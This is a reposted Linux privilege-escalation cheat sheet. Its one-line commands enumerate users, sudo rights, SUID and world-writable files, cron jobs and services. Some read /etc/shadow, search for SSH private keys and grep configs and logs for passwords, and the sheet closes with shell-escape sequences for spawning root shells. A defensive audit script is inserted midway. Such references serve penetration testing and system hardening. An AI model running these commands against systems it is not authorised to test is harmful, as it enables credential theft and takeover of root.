Linux privilege escalation summary
Source: Internet  Published by: 易通网络vpn加速器  Editor: 程序博客网  Time: 2024/05/21 08:45
Kernel, Operating System & Device Information:

uname -a
    Print all available system information
uname -r
    Kernel release
uname -n
    System hostname
hostname
    As above
uname -m
    Linux kernel architecture (32 or 64 bit)
cat /proc/version
    Kernel information
cat /etc/*-release
    Distribution information
cat /etc/issue
    As above
cat /proc/cpuinfo
    CPU information
df -a
    File system information
Users & Groups:

cat /etc/passwd
    List all users on the system
cat /etc/group
    List all groups on the system
for i in $(cat /etc/passwd 2>/dev/null | cut -d":" -f1 2>/dev/null); do id $i; done 2>/dev/null
    List all uids and their respective group memberships
cat /etc/shadow
    Show user hashes (privileged command)
grep -v -E "^#" /etc/passwd | awk -F: '$3 == 0 { print $1}'
    List all super user accounts (uid 0)
finger
    Users currently logged in
pinky
    As above
users
    As above
who -a
    As above
w
    Who is currently logged in and what they're doing
last
    Listing of last logged on users
lastlog
    Information on when all users last logged in
lastlog -u %username%
    Information on when the specified user last logged in
lastlog | grep -v "Never"
    Entire list of previously logged on users
User & Privilege Information:

whoami
    Current username
id
    Current user information
cat /etc/sudoers
    Who's allowed to do what as root (privileged command)
sudo -l
    Can the current user perform anything as root
sudo -l 2>/dev/null | grep -w 'nmap\|perl\|awk\|find\|bash\|sh\|man\|more\|less\|vi\|vim\|nc\|netcat\|python\|ruby\|lua\|irb' | xargs -r ls -la 2>/dev/null
    Can the current user run any 'interesting' binaries as root, and if so also display the binary permissions etc.
Environmental Information:

env
    Display environment variables
set
    As above
echo $PATH
    Path information
history
    Displays command history of current user
pwd
    Print working directory, i.e. 'where am I'
cat /etc/profile
    Display default system variables
cat /etc/shells
    Display available shells
Interesting Files:

find / -perm -4000 -type f 2>/dev/null
    Find SUID files
find / -uid 0 -perm -4000 -type f 2>/dev/null
    Find SUID files owned by root
find / -perm -2000 -type f 2>/dev/null
    Find SGID files
find / -perm -2 -type f 2>/dev/null
    Find world-writeable files
find / ! -path "*/proc/*" -perm -2 -type f -print 2>/dev/null
    Find world-writeable files excluding those in /proc
find / -perm -2 -type d 2>/dev/null
    Find world-writeable directories
find /home -name "*.rhosts" -print 2>/dev/null
    Find rhosts config files
find /home -iname "*.plan" -exec ls -la {} \; -exec cat {} 2>/dev/null \;
    Find *.plan files, list permissions and cat the file contents
find /etc -iname hosts.equiv -exec ls -la {} 2>/dev/null \; -exec cat {} 2>/dev/null \;
    Find hosts.equiv, list permissions and cat the file contents
ls -ahlR /root/
    See if you can access other users' directories to find interesting files
cat ~/.bash_history
    Show the current user's command history
ls -la ~/.*_history
    Show the current user's various history files
ls -la /root/.*_history
    Can we read root's history files
ls -la ~/.ssh/
    Check for interesting ssh files in the current user's directory
find / -name "id_dsa*" -o -name "id_rsa*" -o -name "known_hosts" -o -name "authorized_hosts" -o -name "authorized_keys" 2>/dev/null | xargs -r ls -la
    Find SSH keys/host information
ls -la /usr/sbin/in.*
    Check configuration of inetd services
grep -l -i pass /var/log/*.log 2>/dev/null
    Check log files for keywords ('pass' in this example) and show positive matches
find /var/log -type f -exec ls -la {} \; 2>/dev/null
    List files in specified directory (/var/log)
find /var/log -name "*.log" -type f -exec ls -la {} \; 2>/dev/null
    List .log files in specified directory (/var/log)
find /etc/ -maxdepth 1 -name "*.conf" -type f -exec ls -la {} \; 2>/dev/null
    List .conf files in /etc (recursive 1 level)
ls -la /etc/*.conf
    As above
find / -maxdepth 4 -name "*.conf" -type f -exec grep -Hn password {} \; 2>/dev/null
    Find .conf files (recursive 4 levels) and output the line number where the word 'password' is located
lsof -i -n
    List open files (output will depend on account privileges)
head /var/mail/root
    Can we read root's mail
Service Information:

ps aux | grep root
    View services running as root
ps aux | awk '{print $11}' | xargs -r ls -la 2>/dev/null | awk '!x[$0]++'
    Look up process binary path and permissions
cat /etc/inetd.conf
    List services managed by inetd
cat /etc/xinetd.conf
    As above for xinetd
cat /etc/xinetd.conf 2>/dev/null | awk '{print $7}' | xargs -r ls -la 2>/dev/null
    A very 'rough' command to extract associated binaries from xinetd.conf and show permissions of each
ls -la /etc/exports 2>/dev/null; cat /etc/exports 2>/dev/null
    Permissions and contents of /etc/exports (NFS)
Jobs/Tasks:

crontab -l -u %username%
    Display scheduled jobs for the specified user (privileged command)
ls -la /etc/cron*
    Scheduled jobs overview (hourly, daily, monthly etc)
ls -aRl /etc/cron* | awk '$1 ~ /w.$/' 2>/dev/null
    What can 'others' write in /etc/cron* directories
top
    List of current tasks
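The file and cron checks above look for exactly the misconfigurations a defender should remove first. As an added example (my own code, not from the original cheat sheet or rebootuser.com), this POSIX shell audit reports SUID files, world-writable files and world-writable directories lacking the sticky bit under any tree you pass it, for instance the /etc/cron* directories; the function names are assumptions of mine.

```shell
#!/bin/sh
# Defender-side audit for the conditions enumerated above (added example,
# not part of the original cheat sheet). Needs only find, ls and wc.

# Regular files under $1 with the SUID bit set (cf. find / -perm -4000 -type f).
list_suid() {
    find "$1" -type f -perm -4000 2>/dev/null
}

# World-writable regular files under $1, skipping the /proc and /sys pseudo-filesystems.
list_world_writable_files() {
    find "$1" ! -path "/proc/*" ! -path "/sys/*" -type f -perm -0002 2>/dev/null
}

# World-writable directories under $1 that lack the sticky bit: anyone can
# create or replace entries there. Sticky dirs such as /tmp are excluded.
list_world_writable_dirs() {
    find "$1" ! -path "/proc/*" ! -path "/sys/*" -type d -perm -0002 ! -perm -1000 2>/dev/null
}

# Number of findings from one of the listing functions: 0 means a clean tree.
count_lines() {
    "$@" | wc -l | tr -d ' '
}

# Human-readable report for one tree, e.g. audit_tree /etc/cron.d
# Paths are read line by line so names with spaces are handled.
audit_tree() {
    dir=$1
    printf '== SUID files under %s\n' "$dir"
    list_suid "$dir" | while IFS= read -r f; do ls -la "$f"; done
    printf '== World-writable files under %s\n' "$dir"
    list_world_writable_files "$dir" | while IFS= read -r f; do ls -la "$f"; done
    printf '== World-writable, non-sticky directories under %s\n' "$dir"
    list_world_writable_dirs "$dir" | while IFS= read -r d; do ls -lad "$d"; done
}

# When run directly with arguments, audit each tree given, e.g.:
#   sh audit.sh /etc/cron.d /etc/cron.daily /usr/local/bin
if [ $# -gt 0 ]; then
    for t in "$@"; do audit_tree "$t"; done
fi
```

Anything reported under a cron directory should be fixed (chmod o-w, or restore the package's permissions) rather than merely noted, since a writable job there runs as root on the next schedule.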
Networking, Routing & Communications:

/sbin/ifconfig -a
    List all network interfaces
cat /etc/network/interfaces
    As above
arp -a
    Display ARP communications
route
    Display route information
cat /etc/resolv.conf
    Show configured DNS server addresses
netstat -antp
    List all TCP sockets and related PIDs (-p is a privileged option)
netstat -anup
    List all UDP sockets and related PIDs (-p is a privileged option)
iptables -L
    List firewall rules (privileged command)
cat /etc/services
    View port number/service mappings
Programs Installed:

dpkg -l
    Installed packages (Debian)
rpm -qa
    Installed packages (Red Hat)
sudo -V
    Sudo version: does an exploit exist for it?
httpd -v
    Apache version
apache2 -v
    As above
apache2ctl (or apachectl) -M
    List loaded Apache modules
mysql --version
    Installed MySQL version details
psql -V
    Installed Postgres version details
perl -v
    Installed Perl version details
java -version
    Installed Java version details
python --version
    Installed Python version details
ruby -v
    Installed Ruby version details
find / -name %program_name% 2>/dev/null
    Locate 'useful' programs (i.e. nc, netcat, wget, nmap etc)
which %program_name%
    As above (i.e. nc, netcat, wget, nmap etc)
dpkg --list 2>/dev/null | grep compiler | grep -v decompiler 2>/dev/null && yum list installed 'gcc*' 2>/dev/null | grep gcc 2>/dev/null
    List available compilers
cat /etc/apache2/envvars 2>/dev/null | grep -i 'user\|group' | awk '{sub(/.*\export /,"")}1'
    Which account is Apache running as
Common Shell Escape Sequences:

:!bash
    vi, vim
:set shell=/bin/bash followed by :shell
    vi, vim
!bash
    man, more, less
find / -exec /usr/bin/awk 'BEGIN {system("/bin/bash")}' \;
    find
awk 'BEGIN {system("/bin/bash")}'
    awk
--interactive
    nmap
perl -e 'exec "/bin/bash";'
    Perl

Reposted from: http://www.rebootuser.com/?p=1623#.VzPhuda1nCI